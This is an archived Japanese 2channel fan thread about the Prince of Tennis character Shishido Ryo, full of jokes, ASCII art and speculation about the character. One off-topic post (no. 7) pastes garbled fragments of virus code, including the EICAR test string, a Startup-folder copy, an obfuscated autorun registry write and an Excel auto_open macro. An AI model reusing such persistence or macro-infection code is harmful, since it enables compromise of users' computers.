2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【テニプリ】宍戸亮が好きで×7堪らん人の数→

1 :名無しかわいいよ名無し:2007/11/15(木) 22:18:38 ID:ocCT5kUC
宍戸亮のスペック
氷帝学園中3年
9月29日生まれ
身長 172a
体重 60`
血液型 B型

前スレ
【テニプリ】宍戸亮が好きで×6堪らん人の数→
http://anime2.2ch.net/test/read.cgi/cchara/1184167120/

保管庫(1〜3のログ・更新停止済)
http://uproda.web.fc2.com/index.htm

2 :名無しかわいいよ名無し:2007/11/15(木) 22:23:51 ID:77OkdkFD
(+゚д゚)<宍戸亮が2ゲットだぜ

3 :名無しかわいいよ名無し:2007/11/15(木) 22:33:02 ID:3TWpO2+A
>>1
GEKI-OTSU-DAZE!

4 :名無しかわいいよ名無し:2007/11/15(木) 22:56:45 ID:PXI0snwO
>>1
激乙だぜ!

(+゚д゚)<スレが七つ目突入とは…お前らに感謝だなっ!

5 :名無しかわいいよ名無し:2007/11/15(木) 23:08:43 ID:k031T3zR
>>1
乙です
7スレ突入したテニヌキャラっているのかな?

6 :名無しかわいいよ名無し:2007/11/15(木) 23:16:22 ID:W8rjIMOj
いちおつ

>>5
一度もDAT落ちしてない中では宍戸スレだけだよ
じきに日吉スレも来るけど

7 :名無しかわいいよ名無し:2007/11/15(木) 23:27:35 ID:5kRb0oAi
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


8 :名無しかわいいよ名無し:2007/11/16(金) 00:55:42 ID:laSUKNHR
>>1
激乙!

9 :名無しかわいいよ名無し:2007/11/16(金) 02:09:38 ID:HSFa1IUt
1乙
宍戸あいしてる

10 :名無しかわいいよ名無し:2007/11/16(金) 12:40:01 ID:0uT2hlOi
998:名無しかわいいよ名無し :2007/11/16(金) 10:05:15 ID:UCgDkqDB [sage]
998なら本誌に宍戸さんの影

999:名無しかわいいよ名無し :2007/11/16(金) 11:05:49 ID:yPIBQ3n4 [sage]
999なら宍戸さんは私のものだ

1000:名無しかわいいよ名無し :2007/11/16(金) 11:27:45 ID:mC0jNxry [sage]
>>999
阻止(`・ω・´)

GJwwwwwwwwww

11 :名無しかわいいよ名無し:2007/11/16(金) 16:49:57 ID:QnjuZ8MS
>>11なら>>1激乙

12 :名無しかわいいよ名無し:2007/11/16(金) 20:25:03 ID:DbtRHqEp
>>1
乙戸さん!

13 :名無しかわいいよ名無し:2007/11/16(金) 21:58:02 ID:X3XHWthC
>>1乙は俺が!

前スレ1000ナイス阻止

14 :名無しかわいいよ名無し:2007/11/16(金) 23:19:14 ID:VBI2VopX
>>1 お疲れ

何スレ目いったとか競うのっておかしくね?
確かに愛を語り合った量とかの指標にはなるけど、
なんか格好悪い


15 :名無しかわいいよ名無し:2007/11/16(金) 23:52:07 ID:DmMKIalh
> 愛を語り合った

宍戸愛(*´Д`)ハァハァ

16 :名無しかわいいよ名無し:2007/11/16(金) 23:57:12 ID:OeBpQsIT
>>14
いや別に競ってるつもりはないだろw
「そういえば」くらいの気持ちじゃないの?

17 :名無しかわいいよ名無し:2007/11/17(土) 00:16:21 ID:dkTggCso
どうして腐女子がすぐにマジレスしたがるのはなぜなんだぜ?

18 :名無しかわいいよ名無し:2007/11/17(土) 01:06:45 ID:Q723Sxhu
ちょっと待って
マジレスで申し訳ないんだけど、「悪いもの」=「腐」とか「悪いもの」=「夢」って決めつけて物を言うのはちょっとおかしいんじゃないかな
関係ない他の人も嫌な気持ちになるよ
もし何か問題を起こした人がいたとしてもそれはその人個人の問題であってその人の嗜好の問題じゃないわけだしさ

19 :名無しかわいいよ名無し:2007/11/17(土) 01:47:35 ID:/zPVwKuE
同じ宍戸ファンなのに罵り合いするのはおかしいよ
もうやめよう。

20 :名無しかわいいよ名無し:2007/11/17(土) 09:11:29 ID:kk1gydRf
ネタスレでマジレスされてもwwwww

21 :名無しかわいいよ名無し:2007/11/17(土) 09:20:22 ID:eCoaEUQK
>>18にマジレスしたいがやめておく

22 :名無しかわいいよ名無し:2007/11/17(土) 10:54:51 ID:k4Tt+tEJ
  ○⌒\
  (二二)
  _(+゚д゚) もうすぐ
 / o  つ クリスマスなんだぜ
(_しーJ

23 :名無しかわいいよ名無し:2007/11/17(土) 12:26:28 ID:WmQPvQ2X
クリスマスプレゼントにミントガムあげるから
私には宍戸さんの操ちょーだいね

24 :名無しかわいいよ名無し:2007/11/17(土) 12:44:28 ID:ErbFlM/s
安い操だなぁ…(´;ω;`)

25 :名無しかわいいよ名無し:2007/11/17(土) 13:28:20 ID:a1J7gLxC
>>22
その手に持ってる袋は、住民へのプレゼントが入ってるのか?
まさかみんなからのプレゼントを回収するやつじゃないだろうな…

でも宍戸君なら何かあげてもいいかもな。ただし10000円以内でw

26 :名無しかわいいよ名無し:2007/11/17(土) 13:36:37 ID:+y3ucCv6
クリスマスは住人みんなとビリヤード大会やりましょう宍戸さん!

27 :名無しかわいいよ名無し:2007/11/17(土) 13:51:46 ID:S+aMKFBv
> まさかみんなからのプレゼントを回収するやつじゃないだろうな…

宍戸はそんなに欲張りじゃないです><

28 :名無しかわいいよ名無し:2007/11/17(土) 14:48:31 ID:/zPVwKuE
AAみたいなミニ宍戸サンタにならプレゼント回収されてもいいよ

29 :名無しかわいいよ名無し:2007/11/17(土) 15:31:38 ID:JDicq2/s
(+゚д゚)o<…お?グリップテープが少なくなってきたな……


(+゚ω゚ )o

30 :名無しかわいいよ名無し:2007/11/17(土) 16:08:42 ID:Rk8+M4ZJ
こっち見ん…

ちょっとグリップテープ買ってくる

31 :名無しかわいいよ名無し:2007/11/17(土) 17:01:21 ID:+y3ucCv6
>>30
ちょっと待って私も行く

32 :名無しかわいいよ名無し:2007/11/17(土) 23:16:35 ID:Wm2hbrin
宍戸の誕生日にはケーキ買う人結構いそうだけど、
クリスマスにはみんなリアルで何してる?

33 :名無しかわいいよ名無し:2007/11/17(土) 23:44:26 ID:/CCI1G/7
関係ないけど今日有線で「♪ミントガムの私〜」とかいう歌が流れたんだ
もう宍戸さんしか頭に浮かびませんでしたすみません

34 :名無しかわいいよ名無し:2007/11/18(日) 01:54:31 ID:QlxthSIp
グリーンガムの木もクールミントのペンギンもミントブルーのイルカも宍戸さんに見えます

35 :名無しかわいいよ名無し:2007/11/18(日) 03:40:15 ID:7hnZi71G
しかし宍戸さんは全然甘党には見えないな
ジローや鳳なんかは甘いもの好きそうなイメージあるけど…

まぁでもケーキほうばる宍戸さんももちろん激アリだけどな!

36 :名無しかわいいよ名無し:2007/11/18(日) 15:25:40 ID:GjJ/gNFY
 _」 ̄匚二L
`|_  _|__|
  | |  |
  ヽ_ゝ(+゚Д゚)
「 ̄ヽ__⊂__つ
 \___)__)
    し`J
 | ̄Г ̄|__
| ̄   ̄ ̄|__|__
 ̄] | ̄|__|__|
( o |  | ̄|(+゚Д゚)
└┐ ヽ_ノ(ノ|  |)
 ヽ____ノ_ノ
     し`J
/ ̄/ ̄/ ____
| | |/∩ ヽ ヽ
| | // | (+゚Д゚)
| ヽノ/ |(ノ|  |)
ヽ_ノ_ノ ̄Г ̄|
      し`J
     ∧w∧
    (+゚Д゚)、_
    (__つく>>
 | ̄| | Г ̄|
| ̄   ̄   ̄Г ̄|
 ̄| | ̄|_|(+゚Д゚)
 ヽ ヽ__⊂__⊃
  ヽ___|__|
      し`J


37 :名無しかわいいよ名無し:2007/11/18(日) 15:51:44 ID:8j0WUD6H
本当に寒いですね宍戸さん
こっちはもう雪降ってきたよ…

38 :名無しかわいいよ名無し:2007/11/18(日) 17:58:01 ID:tbY3Tx1I
宍戸さん風邪ひかないようにね

39 :名無しかわいいよ名無し:2007/11/18(日) 18:11:38 ID:d1RNo2Te
髪切った後しばらく「スースーする…」って思ってたんだろうな

40 :名無しかわいいよ名無し:2007/11/18(日) 19:32:57 ID:j5PAZn9t
うぉっ!頭が軽い!髪乾かすのラク!朝は手ぐしでおk!!!
短髪サイコー+。:.゚ヽ(+^∀^)ノ゚.:。+

って思ったに10000ルピー

41 :名無しかわいいよ名無し:2007/11/18(日) 21:13:07 ID:CSKSgfYk
意外と似合ってることに驚愕したに違いない

42 :名無しかわいいよ名無し:2007/11/18(日) 21:28:03 ID:8o5svBTy
トリートメントの宣伝の「さらっ…」な感じのマネが不可能になって
自他共にdrzってなってるってのもそれはそれで激萌


それはそうとアニメ宍戸さんの髪色がいまだに不慣れ
ちょっと髪と雰囲気が成長した裕太に見えて仕方が無い
なんで跡部忍足と一緒に裕太が?ってアニメイトで一瞬悩んでしまったーよ

43 :名無しかわいいよ名無し:2007/11/18(日) 23:08:40 ID:BHAlw3eG
原作の色よりはマシだぜ

44 :名無しかわいいよ名無し:2007/11/19(月) 00:03:11 ID:S7O2um4l
>>42
drzって誤字かと思えば宍戸さんの帽子のツバなのかw始めて見たw
40.5巻ではどこかの学校の過去話?なんてのも載るらしいが
長髪伸ばしかけの若かりし頃の宍戸さんが見てみたい…

45 :名無しかわいいよ名無し:2007/11/19(月) 00:51:02 ID:7AohTSDv
drzっていつ頃出現したんだっけか
最初見た時すごい衝撃的だったwww

46 :名無しかわいいよ名無し:2007/11/19(月) 00:59:07 ID:FzYN6CXF
>>45
調べてみたw
3スレ目だった。初出は去年の9/9、それから数日間で定着してる。

47 :名無しかわいいよ名無し:2007/11/19(月) 01:10:05 ID:7AohTSDv
おおお…わざわざありがとう!!!

drzdrzdrzdrzdrzdrzdrzdrz

48 :名無しかわいいよ名無し:2007/11/19(月) 11:20:54 ID:nJF+RYLT
でも宍戸さんなら例えノッポさんの帽子でも素敵だと思うの

49 :名無しかわいいよ名無し:2007/11/19(月) 11:23:18 ID:nJF+RYLT
ちぇ…
IDあとちょっとでRYOだったのに…

50 :名無しかわいいよ名無し:2007/11/19(月) 11:39:51 ID:mZoQOHTq
>>49
惜しかったね…
と思ってじっと見ていたら下4つのアルファベットが"亮さんはやっぱりラブリーチャーミング"の略に思えてきた…!
重症w

51 :名無しかわいいよ名無し:2007/11/19(月) 21:50:26 ID:pffZDwvd
>>50
吹いたwwww

宍戸さん100曲マラソン出演決定おめー!

52 :名無しかわいいよ名無し:2007/11/19(月) 21:56:21 ID:QlLud5JH
行きてー!

53 :名無しかわいいよ名無し:2007/11/19(月) 22:57:48 ID:V885x8z2
宍戸さん決まったんだ、オメ!

54 :名無しかわいいよ名無し:2007/11/20(火) 01:15:29 ID:iQ5CLzW/
宍戸さんおめー!
見に行くよー!

55 :名無しかわいいよ名無し:2007/11/20(火) 19:16:27 ID:tKNyfxDp
久々に20.5を引っ張り出してきた
何度見てもあの鎖骨は殺人級…ハァハァ
鼻血噴きすぎて貧血だよどうしてくれる

56 :名無しかわいいよ名無し:2007/11/20(火) 21:23:11 ID:0lUyrRg5
(+゚Д゚)<いいえ、ケフィアです

57 :名無しかわいいよ名無し:2007/11/20(火) 22:41:05 ID:eOSfnND1
宍戸さんのユニフォームのボタンの間隔って他の人より広い気がするんだぜ

58 :名無しかわいいよ名無し:2007/11/20(火) 22:48:47 ID:SgAEtDOG
ユニフォームのサイズが大きい気がする
34巻の表紙とかたしけ並みに胸元あいてるし

59 :名無しかわいいよ名無し:2007/11/20(火) 22:57:48 ID:LypanIVY
宍戸さんは、成長期でもっと身長伸びると思ってたから、
あらかじめ大きいサイズを注文したのかも…

60 :名無しかわいいよ名無し:2007/11/20(火) 23:25:56 ID:K0Yi4dAf
>58
(+゚Д゚)<お手!おすわり!

61 :名無しかわいいよ名無し:2007/11/20(火) 23:56:06 ID:SgAEtDOG
IDが犬だw
そういえばウィキの宍戸さんのとこに兄が拾ってきた雑種犬を飼ってるってあるけど
これってどこ情報?20.5にはそんな詳しく載ってないし…

62 :名無しかわいいよ名無し:2007/11/21(水) 00:06:17 ID:I2G3xY4H
>>61
多分、学プリかドキサバのゲーム内で言ってた記憶がある


63 :名無しかわいいよ名無し:2007/11/21(水) 00:36:38 ID:ux3HKw5d
(+゚д゚)WikipediaをWikiって略すのは激ダサだぜ

64 :名無しかわいいよ名無し:2007/11/21(水) 01:03:51 ID:hqpD77wg
>>61 
学プリの動物園デートの時じゃなかったっけ?

65 :名無しかわいいよ名無し:2007/11/21(水) 01:09:24 ID:tMdL23k4
>>62>>64
ありがと。学プリ持ってないから知らなかったよ


66 :名無しかわいいよ名無し:2007/11/21(水) 01:15:02 ID:skmH3akZ
ラブプリには無かったっけ
ドキサバでも聞いたような気がする

PS2ぶっ個割れたから確認出来ない><

67 :名無しかわいいよ名無し:2007/11/21(水) 01:21:32 ID:IZPL296M
>>59
思ってたからって過去形にすんなw
宍戸さんは今でも成長期だ

実際175cmくらいまでは伸びそうだけどな。
高校でグンと伸びる人もいるし

68 :名無しかわいいよ名無し:2007/11/21(水) 01:40:35 ID:NusmdcXs
中3で172cmっていうのは全然小さくない
胸張って生きろ

69 :名無しかわいいよ名無し:2007/11/21(水) 02:05:16 ID:cteQxBej
中3なんて成長期真っ只中だもんなw
スポーツマンだしチーズ好きなくらいだからタンパク質はしっかり摂ってるだろうし

>>55
選抜合宿中に見せた美脚な足組も鼻血もんだったw

70 :名無しかわいいよ名無し:2007/11/21(水) 19:46:57 ID:GUSxTEt0
自分はあの小さな桃尻に激萌え

71 :名無しかわいいよ名無し:2007/11/21(水) 20:26:17 ID:ImsvWAys
>>70
新スレになってから初のNGワードキタ━━━━(゚∀゚)━━━ !!!!!

そんなに宍戸の尻が好きかwww

72 :名無しかわいいよ名無し:2007/11/21(水) 21:11:03 ID:mw88z1Py
宍戸さんって世間的には平均以上に背高いのに
周りのせいで小さく見られがちで可哀想ww

73 :名無しかわいいよ名無し:2007/11/21(水) 22:22:10 ID:X0fWMhDv
(+゚д゚)  どらぁぁぁ
   Y と)
   / _))
  (_/゙J

74 :名無しかわいいよ名無し:2007/11/21(水) 22:23:01 ID:X0fWMhDv
ズレタ・・・drz




 (+゚д゚)  どらぁぁぁ
   Y と)
   / _))
  (_/゙J


75 :名無しかわいいよ名無し:2007/11/21(水) 22:59:25 ID:9zG8OO5l
ここは一応全年齢板なので程々にして下さいね

76 :名無しかわいいよ名無し:2007/11/22(木) 00:12:46 ID:Rv8TrrJC
>>72
氷帝は二年が大きいんだよな
公式データ知るまで
宍戸より日吉の方が身長高いんじゃないかと勝手に思ってた

77 :名無しかわいいよ名無し:2007/11/22(木) 00:15:13 ID:W6FMz3Ag
>75
そんな目くじらたてるようなAAか?
健全消防も購読してる本誌で生ケツ晒した乾もいるってのにw

78 :名無しかわいいよ名無し:2007/11/22(木) 00:24:58 ID:llam9E29
岳人やジローがいるから背高く見られてもいいのにな
氷帝は2年がでかすぎなんだよw
日吉とは身長同じなんだっけ?

79 :名無しかわいいよ名無し:2007/11/22(木) 00:35:48 ID:x/vxwqVd
>>78
身長だけでなく体重も同じ

80 :名無しかわいいよ名無し:2007/11/22(木) 01:27:38 ID:1gegZ6rq
>>77
目くじら立ててないwww
もっと貼れって煽ったつもりだったもうだめぽ

81 :名無しかわいいよ名無し:2007/11/22(木) 01:28:53 ID:llam9E29
>>79
そうなのかサンクス
日吉にだけは身長抜かれないぜ!とか思ってたら萌える
ついでにIDに宍戸さんの誕生日記念

>>80
ドンマイだぜ

82 :名無しかわいいよ名無し:2007/11/22(木) 02:20:50 ID:2O7qTkf3
「Iam929」ってどんな主張だよw

83 :名無しかわいいよ名無し:2007/11/22(木) 09:49:00 ID:gGbra5y8
そんな主張なら私もしてみたい

84 :名無しかわいいよ名無し:2007/11/22(木) 09:58:15 ID:MNa8A0j8
IDチェック(+゚д゚)

85 :名無しかわいいよ名無し:2007/11/22(木) 21:32:59 ID:MKKHlaOA
痛いと思いながらも自分と宍戸の脳内相性メーカーやってみた。
私の脳内は愛と想で埋まってるのに、宍戸は気ばっかり…
そして真ん中に一つ、友……
どういうことだ

86 :名無しかわいいよ名無し:2007/11/23(金) 10:57:35 ID:PEDOsY8b
(+゚д゚)+゚д゚)+゚д゚)ジェットストリームシシド

87 :名無しかわいいよ名無し:2007/11/23(金) 11:39:33 ID:9oiX2hQY
おひとつ頂きますね

つ(+゚д゚))))

88 :名無しかわいいよ名無し:2007/11/23(金) 11:55:04 ID:XLmKmq8b
>>86
私も一人貰っていきますね
つ((+゚Д゚)

89 :名無しかわいいよ名無し:2007/11/23(金) 12:02:49 ID:F6MkPH/I
俺も
つ(+゚д゚))))

90 :名無しかわいいよ名無し:2007/11/23(金) 13:18:30 ID:SaQuQKIl
宍戸さんが三人出てくる時だけ、レスが短時間で連続するよなww
みんな宍戸さんを愛しすぎwww

ところで、今度出る40.5巻に宍戸さんのコーナーがあるんだっけ?

宍戸さんの荷物検査をしてもらいたい…ミントガムが大量に出てきそうだが…

91 :名無しかわいいよ名無し:2007/11/23(金) 14:20:36 ID:ROxZ+IuU
宍戸さんのカバンの中身はぐっちゃぐちゃそうだなー
石とかパン屑とかカラオケの割引券とか出てきそうw
実はハンカチ常備でももゆる
(持たされるだけで使わない)

92 :名無しかわいいよ名無し:2007/11/23(金) 14:29:19 ID:QaIV0XOU
今はもう使わないだろうロン毛用ブラシが未だに入っていたら軽く泣ける

93 :名無しかわいいよ名無し:2007/11/23(金) 16:40:26 ID:08WZ5EC6
ヘアゴムとか入ってたりなwミントガムは常備だろうな

94 :名無しかわいいよ名無し:2007/11/23(金) 23:08:08 ID:I9WqkMk6
たまに間違えてブラックガム買ってしまい涙目の宍戸さん

95 :名無しかわいいよ名無し:2007/11/24(土) 01:24:38 ID:dDrKIShl
何でそんなに可愛いの宍戸さん

96 :名無しかわいいよ名無し:2007/11/24(土) 01:46:32 ID:2TZK3/n+
なんで〜そんなに可愛かよ〜

97 :名無しかわいいよ名無し:2007/11/24(土) 01:50:39 ID:fRZR+zuz
宍戸と言う名の宝物〜

98 :名無しかわいいよ名無し:2007/11/24(土) 07:58:06 ID:JKAahYN8
1時間阻止されなかったら宍戸さんは私のもの

99 :名無しかわいいよ名無し:2007/11/24(土) 08:32:22 ID:edc1Xm0Y
はい残念

100 :名無しかわいいよ名無し:2007/11/24(土) 13:42:00 ID:MJnaUqdB
いつも思うんだけど

(+゚д゚)+゚д゚)+゚д゚)ジェットストリームシシド

とかで貼られた宍戸さんは、貰われていった後どうなるんだろう
大事にされてるんだろうか

きっとテニスとミントガムがないと泣いちゃうんだぜ

101 :名無しかわいいよ名無し:2007/11/24(土) 14:18:47 ID:fRZR+zuz
このスレの住人なら大切にしてくれてるはず!

102 :名無しかわいいよ名無し:2007/11/24(土) 15:11:28 ID:xXy/gmEJ
40.5巻に宍戸さんのページが10p以上ありますように。。。

103 :名無しかわいいよ名無し:2007/11/24(土) 16:10:36 ID:JKAahYN8
どんだけぇぇ

104 :名無しかわいいよ名無し:2007/11/24(土) 21:42:07 ID:VcxX6quw
>>100
全員貰っていきますね
つ(+゚д゚)+゚д゚)+゚д゚)ドナドナドーラァドーラァー

105 :名無しかわいいよ名無し:2007/11/24(土) 21:48:21 ID:lM9l/MGp
欲張っちゃダメなんだぜ

106 :名無しかわいいよ名無し:2007/11/24(土) 21:59:10 ID:fRZR+zuz
みっつならんでししど!ししど!

107 :名無しかわいいよ名無し:2007/11/24(土) 23:02:41 ID:w/HCmxEv
>104ちょっと待ったああ
つ(+゚д゚)+゚д゚)+ ゚ д ゚     )⊂


108 :名無しかわいいよ名無し:2007/11/24(土) 23:51:50 ID:zWsXucvC
>>107
何その大岡越前裁判的な展開w

109 :名無しかわいいよ名無し:2007/11/25(日) 11:45:46 ID:zu7oB6QA
手を離した方が宍戸さんの本当の母おy(ry



そういう訳で真ん中の宍戸さんは頂いていく
つ(+゚д゚)

110 :名無しかわいいよ名無し:2007/11/25(日) 12:00:21 ID:k8JJ9ww5
犬に宍戸って名前付けたら毎日宍戸と散歩したり遊んだり出来るんだよなぁ…

111 :名無しかわいいよ名無し:2007/11/25(日) 12:21:15 ID:NzImZQva
できるけど犬は犬として生きてるから宍戸にはなれないんだぜ…?
ちゃんと名前付けて欲しいんだぜ?

112 :名無しかわいいよ名無し:2007/11/25(日) 13:24:07 ID:AcudsCQn
リョウはどうよ?

113 :名無しかわいいよ名無し:2007/11/25(日) 14:00:51 ID:xMZiQ2gW
いっそのこと宍戸さん、までを名前にしてしまえばいい

114 :名無しかわいいよ名無し:2007/11/25(日) 19:11:53 ID:hGiK89BF
「りょうさん」はどうだ

115 :名無しかわいいよ名無し:2007/11/25(日) 19:51:31 ID:vg707j+o
いぬどさん

116 :名無しかわいいよ名無し:2007/11/25(日) 23:14:56 ID:xMZiQ2gW
尻戸さん

117 :名無しかわいいよ名無し:2007/11/26(月) 00:25:16 ID:4X63Wz8t
そんなに尻が好きかwwwwww

118 :名無しかわいいよ名無し:2007/11/26(月) 01:33:52 ID:1g+zTt9Z
下がりすぎage

119 :名無しかわいいよ名無し:2007/11/26(月) 16:23:36 ID:EKfIkr7w


120 :名無しかわいいよ名無し:2007/11/26(月) 18:36:45 ID:tCbgKGto


121 :名無しかわいいよ名無し:2007/11/26(月) 18:38:40 ID:K8SNBagA


122 :名無しかわいいよ名無し:2007/11/26(月) 19:12:30 ID:fSs25KS6


123 :名無しかわいいよ名無し:2007/11/26(月) 19:43:52 ID:5XH+MRKh


124 :名無しかわいいよ名無し:2007/11/26(月) 20:03:33 ID:j8fpg9Gp


125 :名無しかわいいよ名無し:2007/11/26(月) 20:04:11 ID:mLz7kdqY


126 :名無しかわいいよ名無し:2007/11/26(月) 20:11:34 ID:97FQeFM1


127 :名無しかわいいよ名無し:2007/11/26(月) 20:40:41 ID:K8SNBagA
>>126
ちょwwwww

128 :名無しかわいいよ名無し:2007/11/26(月) 20:46:57 ID:/IgggTGm
なんぞこの流れwww

129 :名無しかわいいよ名無し:2007/11/26(月) 22:36:09 ID:fLQr1Zn+
(+゚д゚) 星の王子さんって激奥深い話だよな
(*´∀`)† 星の王子様なら俺も読んだッスよ宍戸さん!
(;+゚д゚) ……王子さんじゃねえのか?
(`.・ω・)Le Petit Princeだろ?直訳したら「小さな大公」だぜ
ポカーン(+゚д゚)(*´∀`)†……。

130 :名無しかわいいよ名無し:2007/11/26(月) 23:05:40 ID:LTW1Dnz2
このスレに何が起きた?wwほししどのおうじさん・・・

131 :名無しかわいいよ名無し:2007/11/27(火) 01:06:50 ID:PH2KXldJ
宍戸の叔父さん?

132 :名無しかわいいよ名無し:2007/11/27(火) 01:54:35 ID:We6FlYDB
宍戸おじさん?












(+゚┏д┓゚ )

133 :名無しかわいいよ名無し:2007/11/27(火) 02:17:28 ID:S8uMxIvx
宍戸はおっさんになってもカッコいいと思う

134 :名無しかわいいよ名無し:2007/11/27(火) 02:36:26 ID:dq1xpmTX
(+゚┏д┓゚)<俺が攻めに変えてや…ゲフォッ!








(+゚┏д┓゚)<ゴホッ…ゼェゼェ

135 :名無しかわいいよ名無し:2007/11/27(火) 02:50:33 ID:Pkc9beBd
宍戸はきっと禿げないタイプだと信じている

136 :名無しかわいいよ名無し:2007/11/27(火) 07:42:17 ID:MwRWN9wV
チョイ悪オヤジで白髪になってもオープンカー乗り回してるイマゲ

137 :名無しかわいいよ名無し:2007/11/27(火) 11:08:59 ID:Mc4rhqhL
白髪でちょい悪オヤジな宍戸さんを想像すると分かり辛い例で申し訳ないが
三国無双5の孫堅なイマゲ…

138 :名無しかわいいよ名無し:2007/11/27(火) 12:07:05 ID:apnlroO7
>>137
台詞は孫策っぽいし…(スマヒ系宍戸さん&孫策「ノッてきたゼェ!」)
呉の将軍だったのか宍戸さん

139 :名無しかわいいよ名無し:2007/11/27(火) 14:52:07 ID:FHpW6/HD
いずれにせよ>>133でFA?

140 :名無しかわいいよ名無し:2007/11/27(火) 15:03:55 ID:Yc1XPTJX
>>139
異議なし

141 :名無しかわいいよ名無し:2007/11/27(火) 18:56:18 ID:MwRWN9wV
40.5巻による出身小学校データで
ようやく長きにわたる庶民orボンボン論争に終止符が打たれるな

142 :名無しかわいいよ名無し:2007/11/27(火) 19:00:46 ID:9Ywz7oqr
>>141
ちょwwそんなのがあるのかwww
読みきりは跡部中心らしいって聞いたが、宍戸さんも出るのかな?
1年生の頃の宍戸さんとか見てみたい

143 :名無しかわいいよ名無し:2007/11/27(火) 21:37:02 ID:mSS7ky1J
長髪だよね

144 :名無しかわいいよ名無し:2007/11/27(火) 21:42:09 ID:cDyaqR50
>>141散々中学から氷帝で小学校は市立の庶民だって意見が出てたからね。
でもたしけって深く考えてなさそうだからそんな細かい設定ではなさそうだなぁ…

一年の宍戸さんは髪を伸ばしてる最中で肩ぐらいの長さかな?
楽しみだwwww

145 :名無しかわいいよ名無し:2007/11/27(火) 22:53:52 ID:crArnYqz
おぼっちゃん育ちならあんな熱い性格や根性は身につかないような気がする
髪伸ばしてた理由とかも知りたいな

146 :名無しかわいいよ名無し:2007/11/28(水) 11:15:16 ID:bfF8ikzR
熱い性格や根性なら跡部もそうだと思う
ただ人に見せるか見せないかの違いで

147 :名無しかわいいよ名無し:2007/11/28(水) 20:37:45 ID:MLMi2HBT
芥川「私めりーさん、今あなたの後ろにいるの」
(*゚∀(+゚д゚)

シュッ    !!
(+゚д(*゚∀゚)≡


宍戸さんならこの位素で出来そうだとオカルト板見てて思った
武装錬金だかの背後取り合戦を謙也か猛獣神尾とやって欲しい

148 :名無しかわいいよ名無し:2007/11/28(水) 21:01:32 ID:9PKVC5A5
>>147
ワラタw二人とも可愛い

でもたしけは何も考えず氷帝の幼稚舎卒にしてしまいそうな気も…
何にせよ楽しみだ。できれば10.5みたいに自室公開しないかな

149 :名無しかわいいよ名無し:2007/11/28(水) 21:05:59 ID:igqf/oye
宍戸は庶民だけど父親が教師だから息子を公立より私立に入れたがっていろいろ受けた結果氷帝に受かったから通ってるよ派としては、
是非幼稚舎から通っててもらいたい><

150 :名無しかわいいよ名無し:2007/11/29(木) 02:32:42 ID:bBQ0abg3
跡部とは親友であって欲しいって萌えがあるから私も幼稚舎から希望だ

151 :名無しかわいいよ名無し:2007/11/29(木) 03:37:45 ID:qji7qEVf
宍戸さんならいくつでも素敵でしょうね

152 :名無しかわいいよ名無し:2007/11/29(木) 06:51:36 ID:hHDTccH5
発売まであと1週間切ったわけだが楽しみすぐる

153 :名無しかわいいよ名無し:2007/11/29(木) 22:45:54 ID:/obawZKL
>>149
たとえ本当に庶民設定であっても、父親が氷帝の教師だからそんなに学費の面でも苦しくないって
設定だといいな。
個人的には宍戸は「他の地方から父親の仕事の都合で東京に引っ越した」という脳内設定考えてあったよ。
いかにも「坊ちゃん」な集団と一線を画してる感じで勝手に考えてただけなんだけどw


154 :名無しかわいいよ名無し:2007/11/30(金) 01:36:24 ID:WPYD3V5G
宍戸父と太郎が同僚か〜
歳も近そうだね


155 :名無しかわいいよ名無し:2007/11/30(金) 07:10:25 ID:BeWSSmwE
宍戸父と太郎が飲みに行って
深刻そうに宍戸の成績の話をしているのを妄想した

156 :名無しかわいいよ名無し:2007/11/30(金) 07:40:27 ID:OBlbmc0p
私情を持ち込んでは…と思ったけど宍戸父は小学校か
宍戸父が学級崩壊に巻き込まれて参ってませんように(-人-)

157 :名無しかわいいよ名無し:2007/11/30(金) 08:36:23 ID:9Zb74O5O
宍戸一家はこどもに好かれそうなイメージ
男の子はゲンコツで育てる

158 :名無しかわいいよ名無し:2007/11/30(金) 08:50:23 ID:iY3h3OXv
侖 λ...λ...λ...λ... シシドサーンハユカイダーナー♪

159 :名無しかわいいよ名無し:2007/11/30(金) 09:42:30 ID:wV2iwn6o
(+゚д゚)<さーて来週の宍戸さんは…

宍戸です。今朝、犬の散歩していたら一万円札見つけたんだ
早起きは三文の得って本当なんだな!!!
交番に届けたので心当たりある奴は氷帝学園前交番に行って下さい

来週は

宍戸、下剋上される
宍戸、鳳を凰を書き間違える
宍戸、ウス語をマスターする

の三本です

(+゚д゚)<来週もまた見ろよな!ジャーンケーン…ポン!

(+゚д゚)v<チョキ

(+゚д゚)<後だしは禁止なんだぜ


160 :名無しかわいいよ名無し:2007/11/30(金) 10:06:40 ID:x1g8nnXB
子は親を、後輩は先輩を越えていくものだけど
宍戸が下克上される日はまだまだ先




グー

161 :名無しかわいいよ名無し:2007/11/30(金) 13:12:46 ID:uPIkY2uP
チョキかわええwwww

162 :名無しかわいいよ名無し:2007/11/30(金) 14:25:44 ID:PhffZYdj
<<159をアニメ化激希望!

毎週宍戸さんとじゃんけんするんだ!

163 :名無しかわいいよ名無し:2007/11/30(金) 17:23:50 ID:iMkzuIOt
そして毎週じゃんけんに負ける手塚<ラジプリネタ

164 :名無しかわいいよ名無し:2007/12/01(土) 00:23:14 ID:Z0JZ4iTO
宍戸さん毎週おんなじ手出しそうだwww

165 :名無しかわいいよ名無し:2007/12/01(土) 00:41:47 ID:50/anVuk


